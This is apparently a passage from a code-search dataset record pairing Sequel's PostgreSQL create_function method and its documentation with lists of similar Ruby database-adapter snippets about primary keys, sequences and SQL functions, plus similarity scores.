"def pk_and_sequence_for(table) #:nodoc:\n result = query(<<-end_sql, 'PK and serial sequence')[0]\n SELECT columns.column_name, columns.column_default \n FROM primary_keys \n LEFT JOIN columns \n USING(table_name, column_name)\n WHERE primary_keys.table_name = '#{table_name.gsub(/(^\"|\"$)/,'')}'\n end_sql\n \n if result.length == 0\n return nil\n elsif result[0][1].nil?\n return nil\n else\n default_value = result[0][1]\n seq_name = default_value.match(/\\(\\'(\\w+)\\'\\)/).to_a.last\n return [result[0][0], seq_name]\n end\n rescue\n nil\n end",
"def primary_key(table_name) #:nodoc:\r\n sql = \"SELECT COLUMN_NAME FROM (EXECUTE PROCEDURE sp_GetBestRowIdentifier( NULL, NULL, '#{table_name}', NULL, FALSE)) as gbri\"\r\n rs = select(sql)\r\n if !rs.nil? and !rs[0].nil?\r\n strip_or_self(rs[0]['COLUMN_NAME'])\r\n else\r\n nil\r\n end\r\n end",
"def primary_key\n @primary_key ||= @klass.primary_key.to_s\n end",
"def table\n Identity\n end",
"def table\n Identity\n end",
"def primary_key\n \"#{quoted_table_name}.#{model_class.send :primary_key}\"\n end",
"def primary_key\n \"#{quoted_table_name}.#{model_class.send :primary_key}\"\n end",
"def find_primary_key(table)\n query = %q{\n SELECT column_name\n FROM information_schema.table_constraints tc\n INNER JOIN\n information_schema.key_column_usage kcu\n ON tc.constraint_name = kcu.constraint_name\n WHERE constraint_type = 'PRIMARY KEY'\n AND tc.table_catalog = 'reaktor'\n AND tc.table_schema = 'public'\n AND tc.table_name = ?\n ORDER BY ordinal_position;\n }\n\n sth = $dbh_pg.prepare(query)\n begin\n sth.execute(table.to_s)\n rescue\n $stderr.puts \"### Error in #{__FILE__} on line #{__LINE__}. See errorlog\"\n Log.write_log('error', \"Could not find primary key. Message: #{$!}. query: #{get_query_string(sth)}\")\n raise\n exit\n end\n pk = []\n while row = sth.fetch\n pk << row[0]\n end\n return pk\nend",
"def assign_objectid_primary_key\n self.class.objectid_columns_manager.assign_objectid_primary_key(self)\n end",
"def primary_key_attribute\n :id\n end",
"def primary_key\n @primary_key\n end",
"def reset_sequence!(table, column, sequence = nil)\n max_id = select_value(\"select max(#{column}) from #{table}\")\n execute(\"alter sequence #{default_sequence_name(table, column)} restart with #{max_id}\") unless legacy_mode\n execute(\"SET GENERATOR #{default_sequence_name(table, column)} TO #{max_id}\") if legacy_mode\n end",
"def set_primary_key(key)\n clear_setter_methods_cache\n if key.is_a?(Array)\n if key.length < 2\n key = key.first\n else\n key = key.dup.freeze\n end\n end\n self.simple_pk = if key && !key.is_a?(Array)\n (@dataset || db).literal(key).freeze\n end\n @primary_key = key\n end",
"def set_primary_key(key)\n clear_setter_methods_cache\n if key.is_a?(Array)\n if key.length < 2\n key = key.first\n else\n key = key.dup.freeze\n end\n end\n self.simple_pk = if key && !key.is_a?(Array)\n (@dataset || db).literal(key).freeze\n end\n @primary_key = key\n end",
"def primary_key(table_name)\n stmt = @connection.primary_keys(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n result[0] && result[0][3]\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil)\n if ! pk || ! sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n pk ||= default_pk; sequence ||= default_sequence\n end\n if pk && sequence\n quoted_sequence = quote_column_name(sequence)\n\n select_value <<-end_sql, 'Reset Sequence'\n SELECT setval('#{quoted_sequence}', (SELECT COALESCE(MAX(#{quote_column_name pk})+(SELECT increment_by FROM #{quoted_sequence}), (SELECT min_value FROM #{quoted_sequence})) FROM #{quote_table_name(table)}), false)\n end_sql\n end\n end",
"def quoted_primary_key\n @quoted_primary_key ||= connection.quote_column_name(primary_key)\n end",
"def default_sequence_name(table_name, column = nil)\n pk, seq = pk_and_sequence_for(table_name)\n if column && (pk != column)\n # Is this ever actually called with a non-pk column?\n nil\n else\n seq\n end\n rescue\n nil\n end",
"def primary_key_columns\n @columns.values.find_all { |c| c.primary_key? }\n end",
"def primary_key=(value)\n @primary_key = value && value.to_s\n @quoted_primary_key = nil\n end",
"def reset_pk_sequence!(table_name, primary_key=nil, sequence_name=nil)\n primary_key, seq_schema, sequence_name = pk_and_sequence_for(table_name, true)\n if primary_key && !sequence_name\n @logger.warn \"#{table_name} has primary key #{primary_key} with no sequence\" if @logger\n end\n\n if primary_key && sequence_name\n seq_from_where = \"FROM information_schema.sequences \"+\n \"WHERE sequence_schema='#{quote_string(seq_schema)}' \"+\n \"AND sequence_name='#{quote_string(sequence_name)}'\"\n result = select_rows(\n \"SELECT COALESCE(MAX(#{quote_column_name(primary_key)} + (SELECT increment #{seq_from_where})), \"+\n \" (SELECT minimum_value #{seq_from_where})) \"+\n \"FROM #{quote_table_name(table_name)}\",\n SCHEMA_LOG_NAME\n )\n\n if result.length == 1\n # The COMMIT; BEGIN; can go away when 1) transactional DDL is available 2) There is a better restart/set function\n execute(\n \"COMMIT; \"+\n \"CALL sys.alter_seq_restart('#{quote_string(seq_schema)}', '#{quote_string(sequence_name)}', #{result[0][0]}); \"+\n \"BEGIN;\",\n SCHEMA_LOG_NAME\n )\n else\n @logger.warn \"Unable to determin max value for #{table_name}.#{primary_key}\" if @logger\n end\n end\n end",
"def primary_key\n unless @primary_key\n pk_column_names = Set.new( primary_key_columns.collect { |c| c.name } )\n unique_indexes = indexes.values.find_all { |i| i.unique? }\n\n pk_result = []\n\n unique_indexes.each do |idx|\n idx_column_names = Set.new( idx.columns.collect { |c| c.name } )\n r = idx_column_names ^ pk_column_names\n if r.size == 0 then\n pk_result = idx.columns\n break\n end\n end\n\n # no joy, see about just using all the columns that say the are primary\n # keys\n if pk_result.empty? then\n pk_result = self.primary_key_columns\n end\n @primary_key = pk_result\n end\n return @primary_key\n end",
"def primary_key\n 'id'\n end",
"def pk_and_sequence_for(table) #:nodoc:\n # First try looking for a sequence with a dependency on the\n # given table's primary key.\n result = select(<<-end_sql, 'PK and serial sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_namespace name,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? or result.empty?\n # If that fails, try parsing the primary key's default value.\n # Support the 7.x and 8.0 nextval('foo'::text) as well as\n # the 8.1+ nextval('foo'::regclass).\n result = select(<<-end_sql, 'PK and custom sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN split_part(def.adsrc, '''', 2) ~ '.' THEN\n substr(split_part(def.adsrc, '''', 2),\n strpos(split_part(def.adsrc, '''', 2), '.')+1)\n ELSE split_part(def.adsrc, '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND def.adsrc ~* 'nextval'\n end_sql\n end\n\n [result[\"attname\"], result[\"relname\"]]\n rescue\n nil\n end",
"def orchestrate_primary_key\n id\n end",
"def primary_key(table_name)\n table_name = table_name.to_s\n\n @primary_keys ||= {}\n @primary_keys[table_name] ||= if @registration[:primary_key].present?\n @registration[:primary_key].call(@connection, table_name)\n else\n @connection.primary_key(table_name)\n end\n end",
"def find_primary_key_by_table(table_name)\n @opts[:primary_key].values_at(table_name).first\n end",
"def pk_and_sequence_for(table)\n # try looking for a seq with a dependency on the table's primary key :\n result = select(<<-end_sql, 'PK and Serial Sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? || result.empty?\n # if that fails, try parsing the primary key's default value :\n result = select(<<-end_sql, 'PK and Custom Sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN pg_get_expr(def.adbin, def.adrelid) !~* 'nextval' THEN NULL\n WHEN split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2) ~ '.' THEN\n substr(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2),\n strpos(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2), '.')+1)\n ELSE split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND pg_get_expr(def.adbin, def.adrelid) ~* 'nextval|uuid_generate'\n end_sql\n end\n\n [ result['attname'], result['relname'] ]\n rescue\n nil\n end",
"def reset_sequence!(table, column, sequence = nil)\n mpk = select_value(\"SELECT MAX(#{quote_column_name(column)}) FROM #{quote_table_name(table)}\")\n execute(\"ALTER TABLE #{quote_table_name(table)} ALTER COLUMN #{quote_column_name(column)} RESTART WITH #{mpk.to_i + 1}\")\n end",
"def primary_key\n self.class.primary_key == :id ? id : @saved_attributes[self.class.primary_key]\n end",
"def primary_key=(key)\n @primary_key = key\n end",
"def reset_sequence!(table, column, sequence = nil)\n sequence ||= default_sequence_name(table, column)\n max_id = select_value(\"select max(#{column}) from #{table}\")\n execute(\"alter sequence #{sequence} restart with #{max_id}\")\n end",
"def id_column\n IdMethods::ID_COLUMN\n end",
"def primary_key?\n schema && schema[:primary_key]\n end",
"def reset_sequence!(table, column, sequence = nil)\n # Do nothing by default. Implement for PostgreSQL, Oracle, ...\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n self.class.primary_key\n end",
"def set_primary_key_attribute\n base = {}\n base[primary_key] = id\n\n attributes.update(base)\n end",
"def primary_keys(table)\n row = exec_query(<<-end_sql, 'SCHEMA').rows.map do |row|\n SELECT DISTINCT(attr.attname)\n FROM pg_attribute attr\n INNER JOIN pg_depend dep ON attr.attrelid = dep.refobjid AND attr.attnum = dep.refobjsubid\n INNER JOIN pg_constraint cons ON attr.attrelid = cons.conrelid AND attr.attnum = cons.conkey[1]\n WHERE cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n row && row.first\n end\n end",
"def primary_key\n self[:primary_key] ||= self[:model].primary_key\n end",
"def original_primary_key\n if sourceRD.naturalKey == \"id\"\n \"original_id\"\n else\n sourceRD.naturalKey\n end\n end",
"def pre_insert(sql, name, pk, id_value, sequence_name)\n @iiTable = get_table_name(sql)\n @iiCol = get_autounique_column(@iiTable)\n @iiEnabled = false\n\n if @iiCol != nil\n if query_contains_autounique_col(sql, @iiCol)\n begin\n @connection.do(enable_identity_insert(@iiTable, true))\n @iiEnabled = true\n rescue Exception => e\n raise ActiveRecordError, \"IDENTITY_INSERT could not be turned on\"\n end\n end\n end\n end",
"def primary_keys(field)\n sql = \"SELECT #{field.primary_key_col} from #{field.table} \"\n sql += \"#{where_and(sql)} #{field.column} IS NOT NULL \" if field.leave_null\n field.where&.each_pair do |column, value|\n sql += \"#{where_and(sql)} #{column} = #{value} \"\n end\n sql += \"ORDER BY #{field.primary_key_col};\"\n execute(sql).split(\"\\n\")\nend",
"def pk_and_sequence_for(table_name)\n (owner, table_name) = @connection.describe(table_name)\n\n # RSI: changed select from all_constraints to user_constraints - much faster in large data dictionaries\n pks = select_values(<<-SQL, 'Primary Key')\n select cc.column_name\n from user_constraints c, user_cons_columns cc\n where c.owner = '#{owner}'\n and c.table_name = '#{table_name}'\n and c.constraint_type = 'P'\n and cc.owner = c.owner\n and cc.constraint_name = c.constraint_name\n SQL\n\n # only support single column keys\n pks.size == 1 ? [oracle_downcase(pks.first), nil] : nil\n end",
"def supports_primary_key?\n true\n end",
"def column_to_uuid(table, column, seed: nil)\n execute %Q{ALTER TABLE #{table}\n ALTER COLUMN #{column} SET DATA TYPE UUID USING (#{to_uuid_pg(column, seed)})}\n end",
"def primary_key\n '_id'\n end",
"def insert_pk\n (f = opts[:from]) && !f.empty? && (t = f.first)\n case t\n when Symbol, String, SQL::Identifier, SQL::QualifiedIdentifier\n if pk = db.primary_key(t)\n Sequel::SQL::Identifier.new(pk)\n end\n end\n end",
"def primary_key\n self[:primary_key]\n end",
"def primary_key?\n self.primary_key\n end",
"def supports_primary_key?\n true\n end",
"def primary_key_type\n \"integer PRIMARY KEY\"\n end",
"def primary_key\n send( self.class.primary_key )\n end",
"def generate_primary_key\n self[self.class.primary_key] ||= self.class.new_primary_key(10_000)\n end",
"def schema_autoincrementing_primary_key?(schema)\n !!(schema[:primary_key] && schema[:auto_increment])\n end",
"def primary_key(name, type = :primary_key, options = {})\n return super\n end",
"def scaf_serial_columns\n scaf_columns.select { |c| c.primary }\n end",
"def to_param\n self.primary_key\n end",
"def load_identity!\n row_size.times do |r|\n column_size.times do |c|\n self[r, c] = (r == c ? 1 : 0)\n end\n end\n self\n end"
] |
[
"0.6523442",
"0.6269975",
"0.6269304",
"0.6203986",
"0.6120233",
"0.6039965",
"0.60150903",
"0.5958063",
"0.5902873",
"0.58989686",
"0.5894372",
"0.58397007",
"0.5799071",
"0.57580894",
"0.57580894",
"0.5664597",
"0.5664597",
"0.56134826",
"0.56110376",
"0.56110376",
"0.5605405",
"0.5591472",
"0.5589769",
"0.5589769",
"0.556074",
"0.55508524",
"0.5539416",
"0.55338204",
"0.5532486",
"0.5531547",
"0.5500956",
"0.5500956",
"0.5478583",
"0.5451131",
"0.54497653",
"0.54343987",
"0.5425353",
"0.5401119",
"0.5398729",
"0.5388007",
"0.5385998",
"0.5383397",
"0.53417623",
"0.5334881",
"0.5334881",
"0.5321254",
"0.5321254",
"0.53120077",
"0.5310239",
"0.53057885",
"0.53054994",
"0.530493",
"0.53021187",
"0.53021187",
"0.5297121",
"0.5296898",
"0.5294893",
"0.52792466",
"0.52760357",
"0.5274096",
"0.52474475",
"0.523048",
"0.51952076",
"0.51894295",
"0.51848155",
"0.51679045",
"0.5164736",
"0.5155622",
"0.51536095",
"0.5143092",
"0.51411384",
"0.5116889",
"0.51058114",
"0.51057315",
"0.510089",
"0.5096143",
"0.5096143",
"0.5096143",
"0.5095803",
"0.5084646",
"0.5082579",
"0.5076248",
"0.5065557",
"0.5057834",
"0.50451666",
"0.5033326",
"0.5028007",
"0.50272113",
"0.5015421",
"0.50030625",
"0.5002954",
"0.49982563",
"0.4995023",
"0.49671343",
"0.49604118",
"0.49577758",
"0.4943872",
"0.49395725",
"0.49350172",
"0.49332416"
] |
0.8096805
|
0
|
Creates the function in the database. Arguments: name :: name of the function to create definition :: string definition of the function, or object file for a dynamically loaded C function. opts :: options hash: :args :: function arguments, can be either a symbol or string specifying a type or an array of 13 elements: 1 :: argument data type 2 :: argument name 3 :: argument mode (e.g. in, out, inout) :behavior :: Should be IMMUTABLE, STABLE, or VOLATILE. PostgreSQL assumes VOLATILE by default. :parallel :: The thread safety attribute of the function. Should be SAFE, UNSAFE, RESTRICTED. PostgreSQL assumes UNSAFE by default. :cost :: The estimated cost of the function, used by the query planner. :language :: The language the function uses. SQL is the default. :link_symbol :: For a dynamically loaded see function, the function's link symbol if different from the definition argument. :returns :: The data type returned by the function. If you are using OUT or INOUT argument modes, this is ignored. Otherwise, if this is not specified, void is used by default to specify the function is not supposed to return a value. :rows :: The estimated number of rows the function will return. Only use if the function returns SETOF something. :security_definer :: Makes the privileges of the function the same as the privileges of the user who defined the function instead of the privileges of the user who runs the function. There are security implications when doing this, see the PostgreSQL documentation. :set :: Configuration variables to set while the function is being run, can be a hash or an array of two pairs. search_path is often used here if :security_definer is used. :strict :: Makes the function return NULL when any argument is NULL.
|
def create_function(name, definition, opts=OPTS)
self << create_function_sql(name, definition, opts)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_function_sql(name, definition, opts=OPTS)\n args = opts[:args]\n if !opts[:args].is_a?(Array) || !opts[:args].any?{|a| Array(a).length == 3 and %w'OUT INOUT'.include?(a[2].to_s)}\n returns = opts[:returns] || 'void'\n end\n language = opts[:language] || 'SQL'\n <<-END\n CREATE#{' OR REPLACE' if opts[:replace]} FUNCTION #{name}#{sql_function_args(args)}\n #{\"RETURNS #{returns}\" if returns}\n LANGUAGE #{language}\n #{opts[:behavior].to_s.upcase if opts[:behavior]}\n #{'STRICT' if opts[:strict]}\n #{'SECURITY DEFINER' if opts[:security_definer]}\n #{\"PARALLEL #{opts[:parallel].to_s.upcase}\" if opts[:parallel]}\n #{\"COST #{opts[:cost]}\" if opts[:cost]}\n #{\"ROWS #{opts[:rows]}\" if opts[:rows]}\n #{opts[:set].map{|k,v| \" SET #{k} = #{v}\"}.join(\"\\n\") if opts[:set]}\n AS #{literal(definition.to_s)}#{\", #{literal(opts[:link_symbol].to_s)}\" if opts[:link_symbol]}\n END\n end",
"def create_function(function_name, returning, definition, options = {})\n\n function_name = full_function_name(function_name, options)\n language = options[:language] || 'plpgsql'\n replace = if options[:replace] == false\n ''\n else\n 'OR REPLACE '\n end\n volatility = case options[:volatility]\n when :volatile, :stable, :immutable\n \"\\n #{options[:volatility].to_s.upcase}\"\n else\n \"\"\n end\n\n sql = <<-SQL.gsub(/^[ ]{6}/, \"\")\n CREATE #{replace}FUNCTION #{function_name}\n RETURNS #{returning}\n LANGUAGE #{language}#{volatility}\n AS $function$\n #{definition.strip}\n $function$\n SQL\n\n execute(sql)\n end",
"def function(name, *args)\n SQL::Function.new(function_name(name), *args)\n end",
"def function(name, *args)\n SQL::Function.new(name, *args)\n end",
"def create_function(function_name, returning, definition, options = {})\n\n end",
"def create_function( name, arity, type=nil, &block ) # :yields: func, *args\n case type\n when :numeric\n type = SQLite::API::NUMERIC\n when :text\n type = SQLite::API::TEXT\n when :args\n type = SQLite::API::ARGS\n end\n\n callback = proc do |func,*args|\n block.call( FunctionProxy.new( func ), *args )\n end\n\n SQLite::API.create_function( @handle, name, arity, callback )\n SQLite::API.function_type( @handle, name, type ) if type\n\n self\n end",
"def createFunction(code:, name:, isDeterministic: nil) # TESTED\n body = {\n \"code\" => code,\n \"name\" => name,\n \"isDeterministic\" => isDeterministic\n }.delete_if{|k,v| v.nil?}\n request = @@request.merge({ :body => body.to_json })\n result = self.class.post(\"/_db/#{@database}/_api/aqlfunction\", request)\n self.class.return_result result: result\n end",
"def create_function( db, name, args, text, cookie, func, step, final )\n if func || ( step && final )\n cb = CallbackData.new\n cb.proc = cb.proc2 = nil\n cb.data = cookie\n end\n\n if func\n cb.proc = func\n step = final = nil\n elsif step && final\n cb.proc = step\n cb.proc2 = final\n\n func = nil\n end\n\n result = CSSQLite.sqlite3_create_function( db, name, args, text, cb, func, step, final )\n\n # see comments in busy_handler\n if cb\n @callback_data[ name ] = cb\n else\n @callback_data.delete( name )\n end\n\n return result\n end",
"def update_function(name, options = {})\n version = options[:version]\n sql_definition = options[:sql_definition]\n\n if version.nil? && sql_definition.nil?\n raise(\n ArgumentError,\n \"version or sql_definition must be specified\"\n )\n end\n\n sql_definition = sql_definition.strip_heredoc if sql_definition\n sql_definition ||= Fx::Definition.function(name: name, version: version).to_sql\n\n Fx.database.update_function(name, sql_definition)\n end",
"def create_function(params={})\n runtime = params.delete('Runtime') || 'nodejs'\n code = params.delete('Code')\n function_name = params.delete('FunctionName')\n handler = params.delete('Handler')\n role = params.delete('Role')\n\n data = {\n 'Runtime' => runtime,\n 'Code' => code,\n 'FunctionName' => function_name,\n 'Handler' => handler,\n 'Role' => role\n }\n\n description = params.delete('Description')\n data.merge!('Description' => description) if description\n\n memory_size = params.delete('MemorySize')\n data.merge!('MemorySize' => memory_size) if memory_size\n\n timeout = params.delete('Timeout')\n data.merge!('Timeout' => timeout) if timeout\n\n request({\n :method => 'POST',\n :path => '/functions',\n :expects => 201,\n :body => Fog::JSON.encode(data),\n :parser => Fog::AWS::Parsers::Lambda::Base.new\n }.merge(params))\n end",
"def create_schema(name, opts=OPTS)\n self << create_schema_sql(name, opts)\n end",
"def create_proc(name, columns=[], options={}, &block)\n if select_value(\"SELECT count(oid) FROM pg_language WHERE lanname = 'plpgsql' \",\"count\").to_i == 0\n execute(\"CREATE FUNCTION plpgsql_call_handler() RETURNS language_handler AS '$libdir/plpgsql', 'plpgsql_call_handler' LANGUAGE c\")\n execute(\"CREATE TRUSTED PROCEDURAL LANGUAGE plpgsql HANDLER plpgsql_call_handler\")\n end\n\n if options[:force]\n drop_proc(name, columns) rescue nil\n end\n\n if block_given?\n execute get_proc_query(name, columns, options) { yield }\n elsif options[:resource]\n execute get_proc_query(name, columns, options)\n else\n raise StatementInvalid.new(\"Missing function source\")\n end\n end",
"def create_proc(name, columns=[], options={}, &block)\n if select_value(\"SELECT count(oid) FROM pg_language WHERE lanname = 'plpgsql' \",\"count\").to_i == 0\n# execute(\"CREATE FUNCTION plpgsql_call_handler() RETURNS language_handler AS '$libdir/plpgsql', 'plpgsql_call_handler' LANGUAGE c\")\n execute(\"CREATE TRUSTED PROCEDURAL LANGUAGE plpgsql HANDLER plpgsql_call_handler\")\n end\n\n if options[:force]\n drop_proc(name, columns) rescue nil\n end\n\n if block_given?\n execute get_proc_query(name, columns, options) { yield }\n elsif options[:resource]\n execute get_proc_query(name, columns, options)\n else\n raise StatementInvalid.new(\"Missing function source\")\n end\n end",
"def drop_function_sql(name, opts=OPTS)\n \"DROP FUNCTION#{' IF EXISTS' if opts[:if_exists]} #{name}#{sql_function_args(opts[:args])}#{' CASCADE' if opts[:cascade]}\"\n end",
"def update_function(name, args)\n version = args[:version]\n sql_definition = args[:sql_definition]\n revert_to_version = args[:revert_to_version]\n\n if version.nil? && sql_definition.nil?\n raise(\n ArgumentError,\n \"version or sql_definition must be specified\",\n )\n end\n\n sql_definition = sql_definition.strip_heredoc if sql_definition\n sql_definition ||= Fx::Definition.new(\n name: name,\n version: version,\n ).to_sql\n\n Fx.database.update_function(name, sql_definition)\n end",
"def drop_function(name, opts=OPTS)\n self << drop_function_sql(name, opts)\n end",
"def create_language(name, opts=OPTS)\n self << create_language_sql(name, opts)\n end",
"def arel_fn(name, *args)\n Arel::Nodes::NamedFunction.new(name, args)\n end",
"def create!\n Upsert.logger.info \"[upsert] Creating or replacing database function #{name.inspect} on table #{buffer.parent.table_name.inspect} for selector #{selector.map(&:inspect).join(', ')} and columns #{columns.map(&:inspect).join(', ')}\"\n column_definitions = get_column_definitions\n connection.execute <<-EOS\nCREATE OR REPLACE FUNCTION #{name}(#{column_definitions.map { |c| \"#{c.quoted_input_name} #{c.sql_type} DEFAULT #{c.default || 'NULL'}\" }.join(',') }) RETURNS VOID AS\n$$\nBEGIN\n LOOP\n -- first try to update the key\n UPDATE #{quoted_table_name} SET #{column_definitions.map { |c| \"#{c.quoted_name} = #{c.quoted_input_name}\" }.join(',')}\n WHERE #{selector.map { |k| \"#{connection.quote_ident(k)} = #{connection.quote_ident([k,'input'].join('_'))}\" }.join(' AND ') };\n IF found THEN\n RETURN;\n END IF;\n -- not there, so try to insert the key\n -- if someone else inserts the same key concurrently,\n -- we could get a unique-key failure\n BEGIN\n INSERT INTO #{quoted_table_name}(#{column_definitions.map { |c| c.quoted_name }.join(',')}) VALUES (#{column_definitions.map { |c| c.quoted_input_name }.join(',')});\n RETURN;\n EXCEPTION WHEN unique_violation THEN\n -- Do nothing, and loop to try the UPDATE again.\n END;\n END LOOP;\nEND;\n$$\nLANGUAGE plpgsql;\nEOS\n end",
"def create\n database.command({ :create => name }.merge(options))\n end",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def add_function(name, return_type, params, windows_name=nil)\n\t\t\t\t\t\t\tif windows_name == nil\n\t\t\t\t\t\t\t\twindows_name = name\n\t\t\t\t\t\t\tend\n\t\t\t\t\t\t\t@functions[name] = DLLFunction.new(return_type, params, windows_name)\n\t\t\t\t\t\tend",
"def update_function(name, version: nil, sql_definition: nil, revert_to_version: nil)\n if version.blank? && sql_definition.blank?\n raise(\n ArgumentError,\n \"sql_definition or version must be specified\",\n )\n end\n\n if version.present? && sql_definition.present?\n raise(\n ArgumentError,\n \"sql_definition and version cannot both be set\",\n )\n end\n\n sql_definition ||= function_definition(name, version)\n\n Scenic.database.update_function(name, sql_definition)\n end",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def drop_function(function_name, params, options = {})\n SchemaMonkey::Middleware::Migration::CreateFunction.start(connection: self, function_name: function_name, params: params, options: options) do |env|\n function_name = env.function_name\n params = env.params\n options = env.options\n function_type = (options[:function_type] || :function).to_s.upcase\n\n sql = \"DROP #{function_type}\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{function_name}(#{params})\"\n sql += \" CASCADE\" if options[:cascade]\n\n execute sql\n end\n end",
"def add_function(name)\n case name\n when :update_timestamp\n return add_function_update_timestamp\n end\n raise \"called add_function on undefined function '#{name}'\"\n end",
"def named_function(name, expression, function_alias = nil)\n Arel::Nodes::NamedFunction.new(name, expression, function_alias)\n end",
"def generate(name, glsl, typeInfo)\n # Merge type information for all argument lists a function might\n # have.\n minParam, paramTypes = mergeParameterLists(typeInfo.parameterLists)\n\n # Assemble type annotations for the closure compile.\n paramtypestr = []\n paramstr = []\n (0...minParam).each do |i|\n paramtypestr << \" * @param {!(#{paramTypes[i].toClosure})} arg#{i}\\n * Function argument #{i}.\"\n paramstr << \"arg#{i}\"\n end\n (minParam...paramTypes.size).each do |i|\n paramtypestr << \" * @param {!(#{paramTypes[i].toClosure})=} arg#{i}\\n * Function argument #{i}.\"\n paramstr << \"arg#{i}\"\n end\n annotations = paramtypestr.join(\"\\n\")\n\n return <<EOF\n\n/**\n * Create expression for GLSL function '#{glsl}'.\n *\n#{annotations}\n * @return {!embedsl.Expression} Created expression.\n */\nembedsl.lang.#{name} = (function() {\n var cached = #{typeInfo.toEsl};\n return function(#{paramstr.join(\",\\n \")}) {\n var args = Array.prototype.slice.call(arguments);\n return new embedsl.Expression(\n embedsl.Kind.BUILTIN, cached, '#{name}', '#{glsl}', args);\n };\n})();\nEOF\nend",
"def create (name, attrs = {})\n factory_by_name(name).create(attrs)\n end",
"def create (name, attrs = {})\n factory_by_name(name).create(attrs)\n end",
"def call(_obj, args, _ctx)\n create_table = Table.new(\n name: args[:name],\n quantity: args[:quantity],\n )\n return create_table if create_table.save\n GraphQL::ExecutionError.new(\"invalid data\")\n end",
"def function_define(name=\"\",&block)\n \"function #{name}() { #{block.call} }\" \n end",
"def create_schema_sql(name, opts=OPTS)\n \"CREATE SCHEMA #{'IF NOT EXISTS ' if opts[:if_not_exists]}#{quote_identifier(name)}#{\" AUTHORIZATION #{literal(opts[:owner])}\" if opts[:owner]}\"\n end",
"def create_trigger(table, name, function, opts=OPTS)\n self << create_trigger_sql(table, name, function, opts)\n end",
"def puppet_function(name, *args)\n name = name.to_sym unless name.is_a? Symbol\n puppet_function_load name\n if puppet4?\n puppet_scope.call_function name, args\n else\n error \"Could not load Puppet function '#{name}'!\" unless puppet_scope.respond_to? \"function_#{name}\".to_sym\n puppet_scope.send \"function_#{name}\".to_sym, args\n end\n end",
"def create_language_sql(name, opts=OPTS)\n \"CREATE#{' OR REPLACE' if opts[:replace] && server_version >= 90000}#{' TRUSTED' if opts[:trusted]} LANGUAGE #{name}#{\" HANDLER #{opts[:handler]}\" if opts[:handler]}#{\" VALIDATOR #{opts[:validator]}\" if opts[:validator]}\"\n end",
"def call(name, *args)\n memoize(name) {\n if options.key?(name)\n execute_option_function(options[name], *args)\n else\n send(name, *args)\n end\n }\n end",
"def create_trigger_sql(table, name, function, opts=OPTS)\n events = opts[:events] ? Array(opts[:events]) : [:insert, :update, :delete]\n whence = opts[:after] ? 'AFTER' : 'BEFORE'\n if filter = opts[:when]\n raise Error, \"Trigger conditions are not supported for this database\" unless supports_trigger_conditions?\n filter = \" WHEN #{filter_expr(filter)}\"\n end\n \"CREATE #{'OR REPLACE ' if opts[:replace]}TRIGGER #{name} #{whence} #{events.map{|e| e.to_s.upcase}.join(' OR ')} ON #{quote_schema_table(table)}#{' FOR EACH ROW' if opts[:each_row]}#{filter} EXECUTE PROCEDURE #{function}(#{Array(opts[:args]).map{|a| literal(a)}.join(', ')})\"\n end",
"def define_function(name, &block)\n functions[name.to_sym] = block\n nil\n end",
"def create_database_sql(name, opts = {})\n \"CREATE DATABASE #{quote_identifier(name)}\"\n end",
